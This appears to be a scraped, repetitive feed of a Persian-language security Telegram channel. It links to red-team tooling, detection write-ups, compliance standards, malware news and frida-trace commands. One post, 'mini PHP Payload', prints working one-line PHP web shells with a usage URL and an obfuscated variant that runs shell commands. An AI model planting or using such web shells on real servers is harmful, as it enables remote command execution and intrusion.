AV/EDR bypass payload creation tool
🔱 https://djnn.sh/what-i-learned-writing-a-loader-in-golang/
🔥https://github.com/matro7sh/myph
#RedTeam
@Engineer_Computer
🔱 https://djnn.sh/what-i-learned-writing-a-loader-in-golang/
🔥https://github.com/matro7sh/myph
#RedTeam
@Engineer_Computer
GitHub
GitHub - matro7sh/myph: shellcode loader for your evasion needs
shellcode loader for your evasion needs. Contribute to matro7sh/myph development by creating an account on GitHub.
بخوانیم
دستنوشته های یک مهندس کشف
به فرآیند کشف دقت کنید و ببینید همکاری و استفاده از منابع مختلف در طول پروسه کشف چقدر موثر است
https://redcanary.com/blog/bitsadmin/?utm_source=linkedin&utm_medium=social
@Engineer_Computer
دستنوشته های یک مهندس کشف
به فرآیند کشف دقت کنید و ببینید همکاری و استفاده از منابع مختلف در طول پروسه کشف چقدر موثر است
https://redcanary.com/blog/bitsadmin/?utm_source=linkedin&utm_medium=social
@Engineer_Computer
Red Canary
Diary of a Detection Engineer: Blown to BITSAdmin - Red Canary
The combination of the BITSAdmin tool with Veritas backup software pointed our detection engineers to an attempted ransomware attack.
در سیستم مدیریت امنیت اطلاعات کدام اسناد اجباری و تهیه کدام اختیاری است ؟
https://advisera.co/94d436d0
@Engineer_Computer
https://advisera.co/94d436d0
@Engineer_Computer
27001Academy
Mandatory ISO 27001 documents 2022 revision | Get the full list
List of documents and records required by both the main part of the standard and by Annex A. Also, a list of the most common documents used for Annex A.
از این ۱۱۶ پکیج استفاده نکنید
آسیب پذیر هستند
https://securityonline.info/pypi-poisoned-116-malicious-packages-target-windows-and-linux/?expand_article=1
@Engineer_Computer
آسیب پذیر هستند
https://securityonline.info/pypi-poisoned-116-malicious-packages-target-windows-and-linux/?expand_article=1
@Engineer_Computer
Daily CyberSecurity
PyPI Poisoned: 116 Malicious Packages Target Windows and Linux
Most of these packages were taken down by PyPI, ESET collaborated with PyPI to ensure the removal of any remaining malicious packages.
مرور
کشف C2 از روی کدهای DNS
https://www.socinvestigation.com/how-to-detect-malware-c2-with-dns-status-codes/
@Engineer_Computer
کشف C2 از روی کدهای DNS
https://www.socinvestigation.com/how-to-detect-malware-c2-with-dns-status-codes/
@Engineer_Computer
Security Investigation - Be the first to investigate
How to Detect Malware C2 with DNS Status Codes - Security Investigation
DNS (Domain Name System) status codes, also known as DNS response codes or DNS error codes, are numerical codes that indicate the outcome of a DNS query. When a device, such as a web browser, tries to access a domain name (like www.example.com), it sends…
👍1
تناقضاتی در درفت استاندارد جدید NIST
NIST 800-171 R3 Ghost Controls
https://www.linkedin.com/pulse/nist-800-171-r3-ghost-controls-complianceforge-hhbwc?utm_source=share&utm_medium=member_android&utm_campaign=share_via
@Engineer_Computer
NIST 800-171 R3 Ghost Controls
https://www.linkedin.com/pulse/nist-800-171-r3-ghost-controls-complianceforge-hhbwc?utm_source=share&utm_medium=member_android&utm_campaign=share_via
@Engineer_Computer
Linkedin
NIST 800-171 R3 Ghost Controls
What are “ghost controls” in NIST 800-171 R3? A ghost control is a legacy control that does not exist in NIST 800-171 R3 that is still reasonably required to demonstrate compliance. There are several aspects of NIST 800-171 R3 Final Public Draft (FPD) that…
The Art of Linux Persistence .pdf
6.9 MB
هکر ها چطور در لینوکس دسترسی خود را ماندگار میکنند
@Engineer_Computer
@Engineer_Computer
🗒 mini PHP Payload
*
<?=$_GET[0]?>
<?=$_POST[0]?>
<?={$_REQUEST['_']}?>
*
Usage :
Obfuscation :
@Engineer_Computer
*
<?=$_GET[0]?>
<?=$_POST[0]?>
<?={$_REQUEST['_']}?>
*
Usage :
Target.com/path/to/shell.php?0=command*
Obfuscation :
<?=$_="";$_="'";$_=($_^chr(4*4*(5+5)-40)).($_^chr(47+ord(1==1))).($_^chr(ord('_')+3)).($_^chr(((10*10)+(5*3))));$_=${$_}['_'^'o'];echo`$_`?>@Engineer_Computer
🗒 I Hacked Another File Upload Website
بایپس آپلودر و آپلود شل
@Engineer_Computer
https://www.youtube.com/watch?v=BJhTZlg5Ig8
بایپس آپلودر و آپلود شل
@Engineer_Computer
YouTube
I Hacked Another File Upload Website
https://jh.live/snyk || Try Snyk for free and find vulnerabilities in your code and applications! ➡ https://jh.live/snyk
More Fetch the Flag writeups: https://jh.live/ftf-writeups
Free Cybersecurity Education and Ethical Hacking
🔥YOUTUBE ALGORITHM ➡ Like…
More Fetch the Flag writeups: https://jh.live/ftf-writeups
Free Cybersecurity Education and Ethical Hacking
🔥YOUTUBE ALGORITHM ➡ Like…
رمز نگاری منحنی و بیضوی | Elliptic Curve Cryptography
مترجم: میلاد سقایت
دانلود از سایت academia: کلیک کنید
@Engineer_Computer
مترجم: میلاد سقایت
دانلود از سایت academia: کلیک کنید
@Engineer_Computer
تست نفوذ فیزیکی
نقش خدمتکاران سازمان در حوزه امنیت فیزیکی و امنیت اطلاعات
https://covertaccessteam.substack.com/p/the-overlooked-key-exploiting-cleaning
@Engineer_Computer
نقش خدمتکاران سازمان در حوزه امنیت فیزیکی و امنیت اطلاعات
https://covertaccessteam.substack.com/p/the-overlooked-key-exploiting-cleaning
@Engineer_Computer
Substack
The Overlooked Key: Exploiting Cleaning Crew Vulnerabilities in Security Breaches
Covert Access Team is a reader-supported publication.
مقاله مهم
تطابق سنسور ها و جدول ATT&CK
https://medium.com/mitre-engenuity/understanding-the-connection-cybersecurity-events-and-mitre-att-ck-58e977c9fd5a
@Engineer_Computer
تطابق سنسور ها و جدول ATT&CK
https://medium.com/mitre-engenuity/understanding-the-connection-cybersecurity-events-and-mitre-att-ck-58e977c9fd5a
@Engineer_Computer
Medium
Understanding the Connection: Cybersecurity Events and MITRE ATT&CK®
Written by Tiffany Bergeron (@tbergeron) and Lex Crumpton(Lex Crumpton)
یه رایتاپ نچندان فنی ولی جذاب برای مایندست یه هانتر:
https://nmochea.medium.com/a-million-journey-f02df23a2ae7
@Engineer_Computer
https://nmochea.medium.com/a-million-journey-f02df23a2ae7
@Engineer_Computer
Medium
A Million Journey
How I Become a Millionaire
⭕️ محققان دانشگاه Vrije در آمستردام هلند یک حمله Side-Channel جدید به نام SLAM را کشف کردهاند که میتواند برای نشت اطلاعات حساس از حافظه کرنل در CPU های فعلی و آینده ی Intel , AMD و ARM مورد سوء استفاده قرار گیرد.
این حمله یک اکسپلویت از سری حملات Spectre است که بر اساس یک ویژگی جدید در CPU های Intel به نام Linear Address Making (LAM) و همچنین مشابه آن از AMD (به نام Upper Address Ignore یا UAI) و Arm (به نام Top Byte Ignore) است. یا TBI) نیز نامگذاری شده است.
محققان گفتند SLAM به ما اجازه می دهد تا دادههای کرنل ASCII دلخواه را به بیرون بکشیم و میتوان از آن برای افشای Hash رمز عبور Root در عرض چند دقیقه از حافظه کرنل استفاده کرد.
این در حالی است که LAM به عنوان یک ویژگی امنیتی ارائه می شود، این مطالعه نشان داده که امنیت را کاهش می دهد و به طور چشمگیری سطح حمله Spectre را افزایش می دهد که منجر به این حمله میشود که از اجرای حدس و گمان برای استخراج داده های حساس از طریق یک Cache Covert Channel سوء استفاده می کند.
Intel در مستندات خود می گوید این حمله از اثرات جانبی ریزمعماری دستورالعمل های گذرا سوء است
@Engineer_Computer
این حمله یک اکسپلویت از سری حملات Spectre است که بر اساس یک ویژگی جدید در CPU های Intel به نام Linear Address Making (LAM) و همچنین مشابه آن از AMD (به نام Upper Address Ignore یا UAI) و Arm (به نام Top Byte Ignore) است. یا TBI) نیز نامگذاری شده است.
محققان گفتند SLAM به ما اجازه می دهد تا دادههای کرنل ASCII دلخواه را به بیرون بکشیم و میتوان از آن برای افشای Hash رمز عبور Root در عرض چند دقیقه از حافظه کرنل استفاده کرد.
این در حالی است که LAM به عنوان یک ویژگی امنیتی ارائه می شود، این مطالعه نشان داده که امنیت را کاهش می دهد و به طور چشمگیری سطح حمله Spectre را افزایش می دهد که منجر به این حمله میشود که از اجرای حدس و گمان برای استخراج داده های حساس از طریق یک Cache Covert Channel سوء استفاده می کند.
Intel در مستندات خود می گوید این حمله از اثرات جانبی ریزمعماری دستورالعمل های گذرا سوء است
@Engineer_Computer
⭕️چگونگی استفاده از frida-trace برای تحلیل داینامیک اپ های اندرویدی در Termux:
برای تریس کردن ورودی و خروجی متد های موجود در classes.dex توسط روش های زیر قابل انجام میباشد:
توسط پروسس نیم برنامه:
برای تریس کردن لایبرری و فانکشن های داخل آن:
تریس به صورت auto spawn:
@Engineer_Computer
توجه: نصب بودن ابزار frida-tools و انتقال فایل فریدا سرور به دایرکتوری زیر الزامی میباشد
/data/local/tmp
پس از انتقال فایل دسترسی 777 داده و ران کنید.
برای تریس کردن ورودی و خروجی متد های موجود در classes.dex توسط روش های زیر قابل انجام میباشد:
توسط پروسس نیم برنامه:
frida-trace -R -J 'path/to/class!methodName' ProcessNameتریس به صورت auto spawn:
frida-trace -R -J 'path/to/class!methodName' -f com.package.nameتریس برنامه توسط pid برنامه:
frida-trace -R -j 'path/to/class!methodName' -p pid---------------------------------------------------------
برای تریس کردن لایبرری و فانکشن های داخل آن:
تریس به صورت auto spawn:
frida-trace -R -I 'libname.so' -i 'MethodName' -f com.package.nameتوسط پروسس نیم برنامه:
frida-trace -R -I 'libname.so' -i 'MethodName' ProcessNameتریس برنامه توسط pid برنامه:
frida-trace -R -I 'libname.so' -i 'MethodName' -p pid
@Engineer_Computer
🔍 درایورها بخشی جدایی ناپذیر از عملکرد رایانه هستند و آسیب پذیری آنها یا استفاده از درایورهای مخرب می توانند خطرات امنیتی قابل توجهی ایجاد کنند.
⭕️ نظارت بر درایورها شما را قادر می سازد تا تهدیدات احتمالی را زود تشخیص داده و به شما این امکان را می دهد که اقدامات سریعی برای رفع آسیب پذیری ها، حذف درایورهای مخرب و به حداقل رساندن خطر سوء استفاده انجام دهید.
🔬 با استفاده از ابزارهای LolDriverScan یا loldrivers-client که با زبان گولنگ توسعه یافته است میتوانید درایورهای آسیب پذیر را در سیستم خود کشف کنید.
این ابزارها لیست درایورهای مخرب را از
loldrivers.io
گرفته و سیستم را برای هر گونه درایور آسیب پذیر اسکن می کند.
🔬 اسکنرها
🔬 https://github.com/FourCoreLabs/loldriverscan
🔬 https://github.com/rtfmkiesel/loldrivers-client
🛟 پروژه هش لیست درایور های مخرب شناسایی شده
🛟 https://www.loldrivers.io
🛠 سیگما رول جهت شناسایی هش درایور های لود شده و ایجاد هشدار SOC
🛠 https://github.com/magicsword-io/LOLDrivers/blob/main/detections/sigma/driver_load_win_vuln_drivers.yml
@Engineer_Computer
⭕️ نظارت بر درایورها شما را قادر می سازد تا تهدیدات احتمالی را زود تشخیص داده و به شما این امکان را می دهد که اقدامات سریعی برای رفع آسیب پذیری ها، حذف درایورهای مخرب و به حداقل رساندن خطر سوء استفاده انجام دهید.
🔬 با استفاده از ابزارهای LolDriverScan یا loldrivers-client که با زبان گولنگ توسعه یافته است میتوانید درایورهای آسیب پذیر را در سیستم خود کشف کنید.
این ابزارها لیست درایورهای مخرب را از
loldrivers.io
گرفته و سیستم را برای هر گونه درایور آسیب پذیر اسکن می کند.
🔬 اسکنرها
🔬 https://github.com/FourCoreLabs/loldriverscan
🔬 https://github.com/rtfmkiesel/loldrivers-client
🛟 پروژه هش لیست درایور های مخرب شناسایی شده
🛟 https://www.loldrivers.io
🛠 سیگما رول جهت شناسایی هش درایور های لود شده و ایجاد هشدار SOC
🛠 https://github.com/magicsword-io/LOLDrivers/blob/main/detections/sigma/driver_load_win_vuln_drivers.yml
@Engineer_Computer
GitHub
GitHub - FourCoreLabs/LolDriverScan: Scan vulnerable drivers on Windows with loldrivers.io
Scan vulnerable drivers on Windows with loldrivers.io - FourCoreLabs/LolDriverScan
❤1
Roadmap to Become Web3 Developer :
📂 Learn HTML
∟📂 Learn CSS
∟📂 Learn JavaScript
∟📂 Learn React
∟📂 Learn Solidity
∟📂 Learn Ether.js
∟📂 Learn L2
∟📂 Build Projects
∟ ✅ Start Applying for Job’s
@Engineer_Computer
📂 Learn HTML
∟📂 Learn CSS
∟📂 Learn JavaScript
∟📂 Learn React
∟📂 Learn Solidity
∟📂 Learn Ether.js
∟📂 Learn L2
∟📂 Build Projects
∟ ✅ Start Applying for Job’s
@Engineer_Computer
❤1